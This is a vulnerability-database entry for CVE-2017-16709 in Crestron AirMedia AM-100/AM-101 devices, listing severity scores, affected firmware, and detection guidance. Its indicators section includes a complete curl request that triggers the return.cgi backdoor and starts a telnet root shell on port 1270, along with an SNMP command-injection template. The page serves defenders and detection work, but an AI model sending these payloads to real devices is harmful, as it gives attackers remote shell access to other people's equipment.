cbcvebase.
CVE-2017-16709
published 2018-07-11

CVE-2017-16709: Crestron Airmedia AM-100 devices with firmware before 1.6.0 and AM-101 devices with firmware before 2.7.0 allows remote authenticated administrators to execute…

PriorityP269high7.2CVSS 3.0
AVNACLPRHUINSUCHIHAH
EXPLOIT
EPSS
71.96%
99.4th percentile
Crestron Airmedia AM-100 devices with firmware before 1.6.0 and AM-101 devices with firmware before 2.7.0 allows remote authenticated administrators to execute arbitrary code via unspecified vectors.

Affected

2 ranges
VendorProductVersion rangeFixed in
crestronairmedia_am-100_firmware< 1.6.01.6.0
crestronairmedia_am-101_firmware< 2.7.02.7.0

Detection & IOCsextracted from sources · hover to see the quote

path/cgi-bin/return.cgi
commandcurl --header "Content-Type: application/x-www-form-urlencoded" --request POST --data "command=SetFlaghttphttp://192.168.88.253:1270||telnetd -l /bin/sh -b 0.0.0.0:1270|| whoamilol" --insecure https://192.168.88.250/cgi-bin/return.cgi
port1270
otherSNMP OID 1.3.6.1.4.1.3212.100.3.2.9.1.0 (camFWUpgradeFTPURL)
otherSNMP OID 1.3.6.1.4.1.3212.100.3.2.9.5.0 (firmware upgrade trigger)
commandftp://1.1.1.1/$(${cmd})
filenameftpfw.sh
commandpkill -f /etc/reboot.sh
  • Detect unauthenticated POST requests to /cgi-bin/return.cgi containing the string 'SetFlag' in the body, which is the backdoor trigger condition.
  • Monitor SNMP SET operations targeting OID 1.3.6.1.4.1.3212.100.3.2.9.1.0 for values beginning with 'ftp://' followed by shell command injection patterns (e.g., '$(' or '||').
  • Monitor SNMP SET operations targeting OID 1.3.6.1.4.1.3212.100.3.2.9.5.0 with Integer value 1, which triggers the firmware upgrade/command execution.
  • Alert on outbound telnet connections from Crestron AM-100/AM-101 devices, especially on non-standard ports such as 1270, which indicates a spawned backdoor shell.
  • Check SNMP sysDescr (OID 1.3.6.1.2.1.1.1.0) for 'Crestron Electronics AM-100' or 'Crestron Electronics AM-101' to identify vulnerable devices on the network.
  • The exploit payload is padded to exactly 255 bytes in the SNMP OctetString for camFWUpgradeFTPURL; anomalous 255-byte SNMP SET values on this OID are a strong indicator of exploitation.
  • The Metasploit module uses 'linux/armle/meterpreter_reverse_tcp' as the default payload; detect ARMLE Meterpreter reverse TCP connections originating from Crestron AM-100/AM-101 devices.
  • ·A valid SNMP read-write community string is required to exploit the SNMP injection vector; the module defaults to 'private'. Changing or restricting SNMP community strings limits exploitability.
  • ·The backdoor in return.cgi was silently removed in AM-100 firmware 1.6.0.2 with no public documentation; devices on earlier firmware remain vulnerable to unauthenticated exploitation.
  • ·AM-100 and AM-101 are considered EOL with no fix available for the SNMP injection; the Metasploit check module marks them unconditionally vulnerable regardless of firmware version.

CVSS provenance

nvdv3.07.2HIGHCVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
nvdv2.06.5MEDIUMAV:N/AC:L/Au:S/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.